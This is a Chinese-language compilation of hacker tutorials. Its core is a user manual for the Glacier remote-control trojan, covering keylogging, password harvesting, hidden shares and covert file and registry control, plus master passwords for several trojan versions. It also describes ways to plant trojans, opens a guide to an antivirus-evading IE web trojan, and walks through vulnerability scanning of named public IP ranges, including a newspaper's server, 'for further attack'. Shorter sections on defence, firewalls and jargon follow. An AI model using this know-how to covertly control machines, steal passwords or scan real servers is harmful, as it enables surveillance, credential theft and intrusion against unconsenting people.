该软件主要用于远程监控，具体功能包括:

1．自动跟踪目标机屏幕变化，同时可以完全模拟键盘及鼠标输入,即在同步被控端屏幕变化的同时，监控端的一切键盘及鼠标操作将反映在被控端屏幕(局域网适用)；

2．记录各种口令信息：包括开机口令、屏保口令、各种共享资源口令及绝大多数在对话框中出现过的口令信息，且1.2以上的版本中允许用户对该功能自行扩充，2.0以上版本还同时提供了击键记录功能；

3．获取系统信息：包括计算机名、注册公司、当前用户、系统路径、操作系统版本、当前显示分辨率、物理及逻辑磁盘信息等多项系统数据；

4．限制系统功能：包括远程关机、远程重启计算机、锁定鼠标、锁定系统热键及锁定注册表等多项功能限制；

5．远程文件操作：包括创建、上传、下载、复制、删除文件或目录、文件压缩、快速浏览文本文件、远程打开文件（提供了四中不同的打开方式——正常方式、最大化、最小化和隐藏方式）等多项文件操作功能；

6．注册表操作：包括对主键的浏览、增删、复制、重命名和对键值的读写等所有注册表操作功能；

7．发送信息：以四种常用图标向被控端发送简短信息；

8．点对点通讯：以聊天室形式同被控端进行在线交谈。

一.文件列表:

1. G_Server.exe: 被监控端后台监控程序(运行一次即自动安装，可任意改名)，在安装前可以先通过'G_Client'的'配置本地服务器程序'功能进行一些特殊配置，例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等)；

2. G_Client.exe: 监控端执行程序，用于监控远程计算机和配置服务器程序。

二.准备工作:

冰河是一个基于TCP/IP协议和WINDOWS操作系统的网络工具，所以首先应确保该协议已被安装且网络连接无误，然后配置服务器程序(如果不进行配置则取默认设置)，并在欲监控的计算机上运行服务器端监控程序即可。

三.升级方法:

由于冰河2.0的改版较大，所以2.0以后版本与以前各版本完全不兼容。为此只能向老用户提供一套升级方案：对于1.1版本的用户(好象已经没什么人用了)，可以先用1.1或1.2版的CLIENT端将新版本的SERVER程序上传至被监控端，然后执行'文件打开'命令即可；对于1.2版本的用户相对简单，只要通过1.2版的CLIENT远程打开新版本的SERVER程序就可以自动升级了。2.0以后的各版本完全兼容。

'DARKSUN专版'中还提供了另一种升级方法，可以免去在不同版本中切换的麻烦。如果您不能确定远程主机的冰河版本，在用'文件管理器'浏览目录前，最好先在工具栏下的'当前连接'列表框中选择打算连接的主机，然后直接点'升级1.2版本'按钮进行升级，如果返回的信息是'无法解释的命令'，那说明远程主机安装了2.0以上版本，具体的版本及系统信息可以通过'命令控制台'的'口令类命令\系统信息及口令\系统信息'来查看。

四.各模块简要说明:

安装好服务器端监控程序后，运行客户端程序就可以对远程计算机进行监控了，客户端执行程序的各模块功能如下:

1. "添加主机": 将被监控端IP地址添加至主机列表，同时设置好访问口令及端口，设置将保存在'Operate.ini'文件中，以后不必重输。如果需要修改设置，可以重新添加该主机，或在主界面工具栏内重新输入访问口令及端口并保存设置；

2. "删除主机": 将被监控端IP地址从主机列表中删除(相关设置也将同时被清除)；

3. "自动搜索": 搜索指定子网内安装有'冰河'的计算机。(例如欲搜索IP地址'192.168.1.1'至'192.168.1.255'网段的计算机，应将'起始域'设为'192.168.1',将'起始地址'和'终止地址'分别设为'1'和'255')；

4. "查看屏幕": 查看被监控端屏幕(相当于命令控制台中的'控制类命令\捕获屏幕\查看屏幕')；

5. "屏幕控制": 远程模拟鼠标及键盘输入(相当于命令控制台中的'控制类命令\捕获屏幕\屏幕控制')。其余同"查看屏幕"；

6. "冰河信使": 点对点聊天室，也就是传说中的'二人世界'；

7. "升级1.2版本": 通过'DARKSUN专版'的冰河来升级远程1.2版本的服务器程序；

8. "修改远程配置": 在线修改访问口令、监听端口等服务器程序设置，不需要重新上传整个文件，修改后立即生效；

9. "配置本地服务器程序": 在安装前对'G_Server.exe'进行配置(例如是否将动态IP发送到指定信箱、改变监听端口、设置访问口令等)。

五.文件管理器操作说明:

文件管理器对文件操作提供了下列鼠标操作功能：

1. 文件上传：右键单击欲上传的文件，选择'复制'，在目的目录中粘贴即可。也可以在目的目录中选择'文件上传自'，并选定欲上传的文件；

2. 文件下载：右键单击欲下载的文件，选择'复制'，在目的目录中粘贴即可。也可以在选定欲下载的文件后选择'文件下载至'，并选定目的目录及文件名；

3. 打开远程或本地文件：选定欲打开的文件,在弹出菜单中选择'远程打开'或'本地打开'，对于可执行文件若选择了'远程打开'，可以进一步设置文件的运行方式和运行参数(运行参数可为空)；

4. 删除文件或目录：选定欲删除的文件或目录，在弹出菜单中选择'删除'；

5. 新建目录：在弹出菜单中选择'新建文件夹'并输入目录名即可；

6. 文件查找：选定查找路径,在弹出菜单中选择'文件查找'，并输入文件名即可(支持通配符)；

7. 拷贝整个目录(只限于被监控端本机)：选定源目录并复制，选定目的目录并粘贴即可。

六.命令控制台主要命令:

1. 口令类命令: 系统信息及口令、历史口令、击键记录；

2. 控制类命令: 捕获屏幕、发送信息、进程管理、窗口管理、鼠标控制、系统控制、其它控制(如'锁定注册表'等)；

3. 网络类命令: 创建共享、删除共享、查看网络信息；

4. 文件类命令: 目录增删、文本浏览、文件查找、压缩、复制、移动、上传、下载、删除、打开(对于可执行文件则相当于创建进程)；

5. 注册表读写: 注册表键值读写、重命名、主键浏览、读写、重命名；

6. 设置类命令: 更换墙纸、更改计算机名、读取服务器端配置、在线修改服务器配置。

七.使用技巧:

1. 用'查看屏幕'命令抓取对方屏幕信息后,若希望程序自动跟踪对方的屏幕变化,在右键弹出菜单中选中'自动跟踪'项即可；

2. 在文件操作过程中,鼠标双击本地文件将在本地开该文件；鼠标双击远程文件将先下载该文件至临时目录,然后在本地打开；

3. 在使用'网络共享创建'命令时，如果不希望其他人看到新创建的共享名，可以在共享名后加上'$'符号。自己欲浏览时只要在IE的地址栏或'开始菜单'的'运行'对话框内键入'\\[机器名]\[共享名(含'$'符号)]即可；

4. 在1.2以后的版本中允许用户设定捕获图像的色深(1~7级)，图像将按设定保存为2的N次方种颜色(N=2的[1~7]次方)，即1级为单色，2级为16色，3级为256色，依此类推。

需要说明的是如果将色深设为0或8则表示色深依被监控端当前的分辨率而定，适当减小色深可以提高图像的传输速度。

2.1以后的版本新增了以JPEG格式传输图像的功能，以利于在INTERNET上传输图像，但这项功能只适用于2.1以上版本(制被控端)，否则实际上仍是通过BMP图象格式传输，所以请先确认版本后再使用。

八.常见问题:

1. 安装不成功，该问题通常是由于TCP/IP协议安装或设置不正确所致；

2. 被监控端启动时或与监控端连接时弹出'建立连接'对话框，该问题是由于系统设置了自动拨号属性。可以通过安装前定制服务器程序来禁止自动拨号；

3. 可以连接但没有反应，通常是版本不匹配所致，因为1.2以前的版本设计上存在缺陷，所以如果您不能确定远程主机的冰河版本，最好先按照前面所说的升级办法试一下，否则被监控端可能会出现错误提示。另外冰河没有提供代理功能，局域网外无法监控局域网内的机器，除非被控端是网关；

4. '更换墙纸'命令无效，这个问题的可能性太多了，较常见的原因是被监控端的桌面设置为'按WEB页查看'；

5. 对被监控端进行文件或目录的增删操作后，少数情况不会自动刷新，可以通过[Ctrl+R]或选择弹出菜单的'刷新'命令手动刷新；

6. 开机口令不正确，因为CMOS口令是单向编码，所以编码后的口令是不可逆也是不唯一的，冰河通过穷举算出来的口令可能与原口令不符，但也是有效口令。毛主席说过没有调查就没有发言权，所以没有试过就千万别妄下定论；

7. 占用系统资源过高，其实准确的说应该是CPU利用率过高，系统资源占用并不算过分，这主要是不断探测口令信息(敏感字符)造成的，所以在'DARKSUN专版'中允许用户将该功能屏蔽(我实在不知道怎样才能兼顾鱼和熊掌)，只要在配置时清空'敏感字符'中的所有字符串就行了。

8. 如何卸载冰河，这是我解答次数最多的一个问题，其实冰河1.2正式版以后的各版本都在CLIENT端提供了彻底的卸载功能。对于1.2版本，请执行命令列表中的'自动卸载'命令，对其以后的版本，请执行'命令控制台'中的'控制类命令\系统控制\自动卸载冰河'。

小编有言：说说卸冰河木马方法和冰河的通用密码

很多朋友问我中了木马“冰河”有什么方法可以卸掉，其实很简单，有两个方法：

（1）用杀毒软件“金山毒霸”就可以卸掉。但有朋友说用“金山”卸掉“冰河”后
打不开本文文件了，那你可以用手动方法去卸。如果你觉得那个办法太麻烦，可以用我介绍的第二种方法。

（2）用“冰河”卸“冰河”： 如果你确定你的机器种了冰河，那你上网后开启冰河。 在增添主机那里添自己的IP。 然后电击自己的IP， 选命令控制台那里选控制命令里的系统命令。 然后自己看啦。不要再说你不会啊。我会晕的啊。：）

冰河通用密码

3.0版：yzkzero.51.net

3.0版：yzkzero!

3.1-netbug版密码: 123456!@

2.2杀手专版：05181977

2.2杀手专版：dzq2000!

文：残

了解如何种植木马才能防止别人种植木马。看看一般人用的手段。（本文比较适合入门级别选手）

1.网吧种植

这个似乎在以前很流行，先关闭网吧的放火墙，再安装木马客户端，立刻结帐下机，注意，重点是不要重起机器，因为现在网吧都有还原精灵，所以在不关机器的情况下，木马是不会给发现的。因此，在网吧上网，首先要重起机器，其次看看杀毒软件有没有打开。最后建议，不要在网吧打开有重要密码的东西，如网络银行等。毕竟现在木马客户端躲避防火墙的能力很强，其次是还存在其他的病毒。

2.通讯软件传送

发一条消息给你，说，“这个我的照片哦，快看看。”当你接受并打开的时候，你已经中了木马了。（此时，你打开的文件好象“没有任何反应”）“她”可能接着说说：“呀，发错了。再见。”防御：不要轻易接受别人传的东西，其次是打开前要用杀毒软件查毒。

3.恐怖的捆绑

捆绑软件现在很多，具体使用就是把木马客户端和一个其他文件捆绑在一起（拿JPG图象为例），你看到的文件可能是.jpg，图标也是正常（第2条直接传的木马客户端是个windows无法识别文件的图标，比较好认），特别是现在有些捆绑软件对捆绑过后的软件进行优化，杀毒软件很难识别其中是否包含木马程序。建议：不要打开陌生人传递的文件。特别是图象文件。（诱惑力大哦）

4.高深的编译

对木马客户程序进行编译。让木马更加难以识别。（其实效果同第三条）

5.微妙的网页嵌入

将木马安装在自己的主页里面，当你打开页面就自动下载运行。（见下篇，打造网页木马）“你中奖了，请去www.**.com领取你的奖品”，黑客可能这么和你说。建议：陌生人提供的网页不要打开，不要去很奇怪名字的网站。及时升级杀毒软件。

总结：及时升级杀毒软件。不要打开未知文件以及陌生人传来的文件。不要随便打开陌生网页。升级最新版本的操作系统。还有....请看本专题以后的文章咯。

============================================================

你也可以当黑客 打造完美的IE网页木马

（残语：比较适合黑客中级选手，日后将推出视频教程）

既然要打造完美的IE网页木马，首先就必须给我们的完美制定一个标准，我个人认为一个完美的ＩＥ网页木马至少应具备下列四项特征：

一：可以躲过杀毒软件的追杀；

二：可以避开网络防火墙的报警；

三：能够适用于多数的Windows操作系统（主要包括Windows 98、Windows Me、Windows 2000、Windows XP、Windows 2003）中的多数IE版本（主要包括IE5.0、IE5.5、IE6.0），最好能打倒SP补丁；

四：让浏览者不容易发觉IE变化，即可以悄无声息，从而可以长久不被发现。

（注意以上四点只是指网页本身而言，但不包括你的木马程序，也就是说我们的网页木马只是负责运行指定的木马程序，至于你的木马程序的好坏只有你自己去选择啦！别找我要，我不会写的哦！）

满足以上四点我想才可以让你的马儿更青春更长久，跑的更欢更快……

看了上面的几点你是不是心动拉？别急，我们还是先侃侃现有的各种ＩＥ网页木马的不足吧！

第一种：利用古老的MIME漏洞的ＩＥ网页木马

这种木马现在还在流行，但因为此漏洞太过古老且适用的ＩＥ版本较少，而当时影响又太大，补丁差不多都补上啦，因此这种木马的种植成功率比较低。

第二种：利用com.ms.activeX.ActiveXComponent漏洞，结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马

虽然com.ms.activeX.ActiveXComponent漏洞广泛存在于多数ＩＥ版本中，是一个比较好的漏洞，利用价值非常高，但却因为它结合了流行的病毒调用的ＷＳＨ及ＦＳＯ控件，使其虽说可以避开网络防火墙的报警，可逃不脱杀毒软件的追捕（如诺顿）。

第三种：利用OBJECT对象类型确认漏洞（ＯｂｊｅｃｔＤａｔａＲｅｍｏｔｅ）并结合ＷＳＨ及ＦＳＯ控件的ＩＥ网页木马（典型的代表有动鲨网页木马生成器）

此种木马最大的优点是适应的ＩＥ版本多，且漏洞较新，但却有如下不足：

１、因为此漏洞要调用Mshta.exe来访问网络下载木马程序，所以会引起防火墙报警（如天网防火墙）；

２、如果此ＩＥ网页木马又利用了ＷＳＨ及ＦＳＯ控件，同样逃不脱杀毒软件的追捕（如诺顿），而动鲨网页木马又恰恰使用了ＷＳＨ及ＦＳＯ控件，叹口气……可惜呀……？

３、再有就是这个漏洞需要网页服务器支持动态网页如ＡＳＰ、ＪＳＰ、ＣＧＩ等，这就影响了它的发挥，毕竟现在的免费稳定的动态网页空间是少之又少；虽说此漏洞也可利用邮件ＭＩＭＥ的形式来利用，但经测试发现对ＩＥ６．０不起作用。

看到上面的分析你是不是有了这种感觉：千军易得，一将难求，马儿成群，奈何千里马难寻！别急，下面让我带这大家一起打造我心中的完美ＩＥ网页木马。

广陵寒

扫描器的使用

这里我使用x-scanner作为介绍对象，原因是x-scanner集成了多种扫描功能于一身，它可以采用多线程方式对指定IP地址段（或独立IP地址）进行安全漏洞扫描，提供了图形界面和命令行两种操作方式，扫描内容包括：标准端口状态及端口banner信息、CGI漏洞、RPC漏洞、SQL-SERVER默认帐户、FTP弱口令，NT主机共享信息、用户信息、组信息、NT主机弱口令用户等。扫描结果保存在/log/目录中，index_*.htm为扫描结果索引文件。对于一些已知的CGI和RPC漏洞，x-scanner给出了相应的漏洞描述、利用程序及解决方案，节省了查找漏洞介绍的时间。

首先x-scanner包括了两个运行程序：xscann.exe和xscan_gui.exe，这两个程序分别是扫描器的控制台版本和窗口版本，作为初学者可能更容易接受窗口版本的扫描软件，因为毕竟初学者使用最多的还是“应用程序”，无论运行那一个版本，他们的功能都是一样的。首先让我们运行窗口版本看看：窗口分为左右两部分，左面是进行扫描的类型，这包括前面提到的漏洞扫描、端口扫描等基本内容；另一部分是有关扫描范围的设定，xscanner可以支持对多个IP地址的扫描，也就是说使用者可以利用xscanner成批扫描多个IP地址，例如在IP地址范围内输入211.100.8.1-211.100.8.255就会扫描整个C类的255台服务器（如果存在的话），这样黑客可以针对某一个漏洞进行搜索，找到大范围内所有存在某个漏洞的服务器。当然如果只输入一个IP地址，扫描程序将针对单独IP进行扫描。

剩下的端口设定在前面已经介绍过，一般对于网站服务器，这个端口选取80或者8080，对于某些特殊的服务器也许还有特殊的端口号，那需要通过端口扫描进行寻找。多线程扫描是这个扫描器的一大特色，所谓多线程就是说同时在本地系统开辟多个socket连接，在同一时间内扫描多个服务器，这样做的好处是提高了扫描速度，节省时间，根据系统的资源配置高低，线程数字也可以自行设定（设定太高容易造成系统崩溃）。

在图形界面下我们看到了程序连接地址“.\xscan.exe”，这实际上就是xscanner的控制台程序，也就是说图形窗口只是将控制台扫描器的有关参数设置做了“傻瓜化”处理，程序运行真正执行的还是控制台程序。因此学习控制台是黑客所必需的，而且使用控制台模式的程序也是真正黑客喜爱的操作方式。

现在我们进行一个简单的cgi漏洞扫描，这次演练是在控制台模式下进行的：xscan 211.100.8.87 -port

这个命令的意思是让xscanner扫描服务器211.100.8.87的开放端口，扫描器不会对65535个端口全部进行扫描（太慢），它只会检测网络上最常用的几百个端口，而且每一个端口对应的网络服务在扫描器中都已经做过定义，从最后返回的结果很容易了解服务器运行了什么网络服务。扫描结果显示如下：

Initialize dynamic library succeed.

Scanning 211.100.8.87 ......

[211.100.8.87]: Scaning port state ...

[211.100.8.87]: Port 21 is listening!!!

[211.100.8.87]: Port 25 is listening!!!

[211.100.8.87]: Port 53 is listening!!!

[211.100.8.87]: Port 79 is listening!!!

[211.100.8.87]: Port 80 is listening!!!

[211.100.8.87]: Port 110 is listening!!!

[211.100.8.87]: Port 3389 is listening!!!

[211.100.8.87]: Port scan completed, found 7.

[211.100.8.87]: All done.

这个结果还会同时在log目录下生成一个html文档，阅读文档可以了解发放的端口对应的服务项目。从结果中看到，这台服务器公开放了七个端口，主要有21端口用于文件传输、80端口用于网页浏览、还有110端口用于pop3电子邮件，如此一来，我们就可以进行有关服务的漏洞扫描了。(关于端口的详细解释会在后续给出)

然后可以使用浏览看看这个服务器到底是做什么的，通过浏览发现原来这是一家报社的电子版面，这样黑客可以继续对服务器进行漏洞扫描查找服务器上是否存在perl漏洞，之后进行进一步进攻。

漏洞扫描的道理和端口扫描基本上类似，例如我们可以通过扫描器查找61.135.50.1到61.135.50.255这255台服务器上所有开放了80端口的服务器上是否存在漏洞，并且找到存在什么漏洞，则可以使用xscan 61.135.50.1-61.135.50.255 -cgi进行扫描，因为结果比较多，通过控制台很难阅读，这个时候xscanner会在log下生成多个html的中文说明，进行阅读这些文档比较方便。

二、扫描器使用问题：

载使用漏洞扫描器的过程中，学习者可能会经常遇到一些问题，这里给出有关问题产生的原因和解决办法。扫描器的使用并不是真正黑客生涯的开始，但它是学习黑客的基础，所以学习者应该多加练习，熟练掌握手中使用的扫描器，了解扫描器的工作原理和问题的解决办法。

1、为什么我找不到扫描器报告的漏洞？

扫描器报告服务器上存在某个存在漏洞的文件，是发送一个GET请求并接收服务器返回值来判断文件是否存在，这个返回值在HTTP的协议中有详细的说明，一般情况下“200”是文件存在，而“404”是没有找到文件，所以造成上面现象的具体原因就暴露出来了。

造成这个问题的原因可能有两种：第一种可能性是您的扫描器版本比较低，扫描器本身存在“千年虫”问题，对于返回的信息扫描器在判断的时候，会错误的以为时间信息2000年x月x日中的200是“文件存在”标志，这样就会造成误报；

另外一种可能性是服务器本身对“文件不存在”返回的头部信息进行了更改，如果GET申请的文件不存在，服务器会自动指向一个“没有找到页面”的文档，所以无论文件是否存在，都不会将“404”返回，而是仍然返回成功信息，这样做是为了迷惑漏洞扫描器，让攻击者不能真正判断究竟那个漏洞存在于服务器上。

这一问题的解决办法也要分情况讨论，一般说来第一种情况比较容易解决，直接升级漏洞扫描器就可以了，对于第二种情况需要使用者对网络比较熟悉，有能力的话可以自己编写一个漏洞扫描器，自己编写的扫描器可以针对返回文件的大小进行判断，这样就可以真正确定文件是否存在，但这种方法对使用者的能力要求较高。

2、我使用的扫描器速度和网络速度有关系嘛？

关系不大。扫描器发送和接收的信息都很小，就算是同时发送上百个GET请求一般的电话上网用户也完全可以做得到，影响扫描器速度的主要因素是服务器的应答速度，这取决于被扫描服务器的系统运行速度。如果使用者希望提高自己的扫描速度，可以使用支持多线程的扫描器，但是因为使用者本地电脑档次问题，也不可能将线程设置到上百个，那样的话会造成本地系统瘫痪，一般使用30个线程左右比较合适。

另外对于很多网络服务器来说，为了防止黑客的扫描行为，可能会在防火墙上设置同一IP的单位时间GET申请数量，这样做目的就是避免黑客的扫描和攻击，所以在提高本地扫描速度之前，应该先确认服务器没有相应的过滤功能之后再使用。

3、扫描器报告给我的漏洞无法利用是什么原因？

确切地说扫描器报告的不是“找到的漏洞”，而是找到了一个可能存在漏洞的文件，各种网络应用程序都可能存在漏洞，但是在更新版本的过程中，老版本的漏洞会被修补上，被扫描器找到的文件应该经过手工操作确认其是否是存在漏洞的版本，这可以通过阅读网络安全网站的“安全公告”获得相应知识。

对于已经修补上漏洞的文件来说，也不代表它一定不再存有漏洞，而只能说在一定程度上没有漏洞了，也许在明天，这个新版本的文件中又会被发现还存在其他漏洞，因此这需要网络安全爱好者时刻关注安全公告。当然如果攻击者或者网络管理员对编程比较熟悉，也可以自己阅读程序并力图自己找到可能的安全隐患，很多世界著名的黑客都是不依*他人，而是自己寻找漏洞进行攻击的。

4、扫描器版本比较新，然而却从来没有找到过漏洞是什么原因？

有一些扫描器专门设计了“等待时间”，经过设置可以对等待返回信息的时间进行调整，这就是说在“网络连接超时”的情况下，扫描器不会傻傻的一直等待下去。但如果你的网络速度比较慢，有可能造成扫描器没有来得及接收返回信息就被认为“超时”而越了过去继续下面的扫描，这样当然是什么也找不到啦。

如果问题真的如此，可以将等待时间设置的长一些，或者换个ISP拨号连接。

5、扫描器报告服务器没有提供HTTP服务？

网络上大多数HTTP服务器和漏洞扫描器的默认端口都是80，而有少量的HTTP服务器并不是使用80端口提供服务的，在确认服务器的确开通了网站服务的情况下，可以用端口扫描器察看一下对方究竟使用什么端口进行的HTTP服务，网络上常见的端口还有8080。

另外这种情况还有一种可能性，也许是使用者对扫描器的参数设置不正确造成的，很多扫描器的功能不仅仅是漏洞扫描，有可能还提供了rpc扫描、ftp默认口令扫描和NT弱口令扫描等多种功能，因此在使用每一款扫描器之前，都应该自己阅读有关的帮助说明，确保问题不是出在自己身上。

6、扫描器使用过程中突然停止响应是为什么？

扫描器停止响应是很正常的，有可能是因为使用者连接的线程过多，本地系统资源不足而造成系统瘫痪、也可能是因为对方服务器的响应比较慢，依次发送出去的请求被同时反送回来而造成信息阻塞、还有可能是服务器安装了比较恶毒的防火墙，一旦察觉有人扫描就发送特殊的数据报回来造成系统瘫痪……

因此扫描器停止响应不能简单的说是为什么，也没有一个比较全面的解决方案，不过一般情况下遇到这种问题，我建议你可以更换其他扫描器、扫描另外一些服务器试试，如果问题还没有解决，就可能是因为扫描器与你所使用的系统不兼容造成的，大多数基于微软视窗的漏洞扫描器都是运行在Windows9X下的，如果是Win2000或者NT也有可能造成扫描器无法正常工作。

7、下载回来的扫描器里面怎么没有可执行文件？

扫描器不一定非要是可执行的exe文件，其他例如perl、cgi脚本语言也可以编写扫描器，因此没有可执行文件的扫描器也许是运行在网络服务器上的，这种扫描器可以被植入到网络上的其它系统中，不需要使用者上网就能够24小时不停的进行大面积地址扫描，并将结果整理、分析，最后通过Email发送到指定的电子信箱中，因此这是一种比较高级的扫描器，初学者不适合使用。

另外注意载下在扫描器的时候注意压缩报文件的扩展名，如果是tar为扩展名，那么这个扫描器是运行在Linux系统下的，这种其它操作平台的扫描器无法在视窗平台下应用，文件格式也和FAT32不一样。

8、扫描器只报告漏洞名称，不报告具体文件怎么办？

只要漏洞被发现，网络安全组织即会为漏洞命名，因此漏洞名称对应的文件在相当广泛的范围内都是统一的，只要知道了漏洞的名称，黑客就可以通过专门的漏洞搜索引擎进行查找，并且学习到与找到漏洞相关的详细信息。这种“漏洞搜索引擎”在网络上非常多，例如我国“绿盟”提供的全中文漏洞搜索引擎就是比较理想的一个。

===========================================================

如何防范黑客

黑客对服务器进行扫描是轻而易举的，一旦找到了服务器存在的问题，那么后果将是严重的。这就是说作为网络管理员应该采取不要的手段防止黑客对服务器进行扫描，本节我将谈谈如何才能让自己的服务器免遭黑客扫描。

一、防范黑客心得体会：

1、屏蔽可以IP地址：

这种方式见效最快，一旦网络管理员发现了可疑的IP地址申请，可以通过防火墙屏蔽相对应的IP地址，这样黑客就无法在连接到服务器上了。但是这种方法有很多缺点，例如很多黑客都使用的动态IP，也就是说他们的IP地址会变化，一个地址被屏蔽，只要更换其他IP仍然可以进攻服务器，而且高级黑客有可能会伪造IP地址，屏蔽的也许是正常用户的地址。

2、过滤信息包：

通过编写防火墙规则，可以让系统知道什么样的信息包可以进入、什么样的应该放弃，如此一来，当黑客发送有攻击性信息包的时候，在经过防火墙时，信息就会被丢弃掉，从而防止了黑客的进攻。但是这种做法仍然有它不足的地方，例如黑客可以改变攻击性代码的形态，让防火墙分辨不出信息包的真假；或者黑客干脆无休止的、大量的发送信息包，知道服务器不堪重负而造成系统崩溃。

3、修改系统协议：

对于漏洞扫描，系统管理员可以修改服务器的相应协议，例如漏洞扫描是根据对文件的申请返回值对文件存在进行判断的，这个数值如果是200则表示文件存在于服务器上，如果是404则表明服务器没有找到相应的文件，但是管理员如果修改了返回数值、或者屏蔽404数值，那么漏洞扫描器就毫无用处了。

4、经常升级系统版本：

任何一个版本的系统发布之后，在短时间内都不会受到攻击，一旦其中的问题暴露出来，黑客就会蜂拥而致。因此管理员在维护系统的时候，可以经常浏览著名的安全站点，找到系统的新版本或者补丁程序进行安装，这样就可以保证系统中的漏洞在没有被黑客发现之前，就已经修补上了，从而保证了服务器的安全。

5、及时备份重要数据：

亡羊补牢，如果数据备份及时，即便系统遭到黑客进攻，也可以在短时间内修复，挽回不必要的经济损失。想国外很多商务网站，都会在每天晚上对系统数据进行备份，在第二天清晨，无论系统是否收到攻击，都会重新恢复数据，保证每天系统中的数据库都不会出现损坏。数据的备份最好放在其他电脑或者驱动器上，这样黑客进入服务器之后，破坏的数据只是一部分，因为无法找到数据的备份，对于服务器的损失也不会太严重。

然而一旦受到黑客攻击，管理员不要只设法恢复损坏的数据，还要及时分析黑客的来源和攻击方法，尽快修补被黑客利用的漏洞，然后检查系统中是否被黑客安装了木马、蠕虫或者被黑客开放了某些管理员账号，尽量将黑客留下的各种蛛丝马迹和后门分析清除、清除干净，防止黑客的下一次攻击。

6、使用加密机制传输数据：

对于个人信用卡、密码等重要数据，在客户端与服务器之间的传送，应该仙经过加密处理在进行发送，这样做的目的是防止黑客监听、截获。对于现在网络上流行的各种加密机制，都已经出现了不同的破解方法，因此在加密的选择上应该寻找破解困难的，例如DES加密方法，这是一套没有逆向破解的加密算法，因此黑客的到了这种加密处理后的文件时，只能采取暴力破解法。个人用户只要选择了一个优秀的密码，那么黑客的破解工作将会在无休止的尝试后终止。

二、防火墙使用说明：

1．什么是防火墙？

防火墙的英文叫做firewall，它能够在网络与电脑之间建立一道监控屏障，保护在防火墙内部的系统不受网络黑客的攻击。逻辑上讲，防火墙既是信息分离器、限制器，也是信息分析器，它可以有效地对局域网和Internet之间的任何活动进行监控，从而保证局域网内部的安全。

网络上最著名的软件防火墙是LockDown2000，这套软件需要经过注册才能获得完整版本，它的功能强大，小到保护个人上网用户、大到维护商务网站的运作，它都能出色的做出惊人的表现。但因为软件的注册需要一定费用，所以对个人用户来说还是选择一款免费的防火墙更现实。天网防火墙在这里就更加适合个人用户的需要了，天网防火墙个人版是一套给个人电脑使用的网络安全程序，它能够抵挡网络入侵和攻击，防止信息泄露。

2、天网防火墙的基本功能：

天网防火墙个人版把网络分为本地网和互联网，可以针对来自不同网络的信息，来设置不同的安全方案，以下所述的问题都是针对互联网而言的，故所有的设置都是在互联网安全级别中完成的。 怎样防止信息泄露？ 如果把文件共享向互联网开放，而且又不设定密码，那么别人就可以轻松的通过互联网看到您机器中的文件，如果您还允许共享可写，那别人甚至可以删除文件。 你可以在个人防火墙的互联网安全级别设置中，将NETBIOS 关闭，这样别人就不能通过INTERNET访问你的共享资源了（这种设置不会影响你在局域网中的资源共享）。

当拨号用户上网获得了分配到的IP地址之后，可以通过天网防火墙将ICMP关闭，这样黑客用PING的方法就无法确定使用者的的系统是否处于上网状态，无法直接通过IP地址获得使用者系统的信息了。

需要指出的是：防火墙拦截的信息并不完全是攻击信息，它记录的只是系统在安全设置中所拒绝接收的数据包。在某些情况下，系统可能会收到一些正常但又被拦截的数据包，例如某些路由器会定时发出一些IGMP包等；或有些主机会定时PING出数据到本地系统确认连接仍在维持着，这个时候如果利用防火墙将ICMP和IGMP屏蔽了，就会在安全记录中见到这些被拦截的数据包，因此这些拦截下来的数据包并不一定是黑客对系统进行攻击造成的。

3、使用防火墙的益处：

使用防火墙可以保护脆弱的服务，通过过滤不安全的服务，Firewall可以极大地提高网络安全和减少子网中主机的风险。例如，Firewall可以禁止NIS、NFS服务通过，同时可以拒绝源路由和ICMP重定向封包。

另外防火墙可以控制对系统的访问权限，例如某些企业允许从外部访问企业内部的某些系统，而禁止访问另外的系统，通过防火墙对这些允许共享的系统进行设置，还可以设定内部的系统只访问外部特定的Mail Server和Web Server，保护企业内部信息的安全。

4、防火墙的种类：

防火墙总体上分为包过滤、应用级网关和代理服务器等三种类型：

（1）数据包过滤

数据包过滤(Packet Filtering)技术是在网络层对数据包进行选择，选择的依据是系统内设置的过滤逻辑，被称为访问控制表(Access Control Table)。通过检查数据流中每个数据包的源地址、目的地址、所用的端口号、协议状态等因素，或它们的组合来确定是否允许该数据包通过。 数据包过滤防火墙逻辑简单，价格便宜，易于安装和使用，网络性能和透明性好，它通常安装在路由器上。路由器是内部网络与Internet连接必不可少的设备，因此在原有网络上增加这样的防火墙几乎不需要任何额外的费用。

数据包过滤防火墙的缺点有二：一是非法访问一旦突破防火墙，即可对主机上的软件和配置漏洞进行攻击；二是数据包的源地址、目的地址以及IP的端口号都在数据包的头部，很有可能被窃听或假冒。

（2）应用级网关

应用级网关(Application Level Gateways)是在网络应用层上建立协议过滤和转发功能。它针对特定的网络应用服务协议使用指定的数据过滤逻辑，并在过滤的同时，对数据包进行必要的分析、登记和统计，形成报告。实际中的应用网关通常安装在专用工作站系统上。

数据包过滤和应用网关防火墙有一个共同的特点，就是它们仅仅依*特定的逻辑判定是否允许数据包通过。一旦满足逻辑，则防火墙内外的计算机系统建立直接联系，防火墙外部的用户便有可能直接了解防火墙内部的网络结构和运行状态，这有利于实施非法访问和攻击。

（3）代理服务

代理服务(Proxy Service)也称链路级网关或TCP通道(Circuit Level Gateways or TCP Tunnels)，也有人将它归于应用级网关一类。它是针对数据包过滤和应用网关技术存在的缺点而引入的防火墙技术，其特点是将所有跨越防火墙的网络通信链路分为两段。防火墙内外计算机系统间应用层的" 链接"，由两个终止代理服务器上的" 链接"来实现，外部计算机的网络链路只能到达代理服务器，从而起到了隔离防火墙内外计算机系统的作用。此外，代理服务也对过往的数据包进行分析、注册登记，形成报告，同时当发现被攻击迹象时会向网络管理员发出警报，并保留攻击痕迹

=========================================================

黑客之“名词介绍”

1.肉鸡，或者留了后门，可以被我们远程操控的机器，现在许多人把有WEBSHELL权限的机器也叫肉鸡。

2、木马：特洛伊木马，大家在电影《特洛伊》里应该看到了，战争是特络伊故意留下了个木马，多方以为是战利品，带回城后，木马里面全是战士，这种东西，就叫做木马，可以说木马就是一方给肉鸡留下的东西，可以做到远程控制的目的，木马还分不同的作用，有盗号专用的木马，有远程控制专用的木马，下面介绍点：盗号专用的有许多，盗QQ的有 啊拉QQ大盗，强强盗QQ，传奇木马生成器，魔兽木马生成器等；远程控制的木马有：冰河(国人的骄傲，中国第一款木马)，灰鸽子，PCshare，网络神偷，FLUX等，现在通过线程插入技术的木马也有很多，大家自己找找吧。

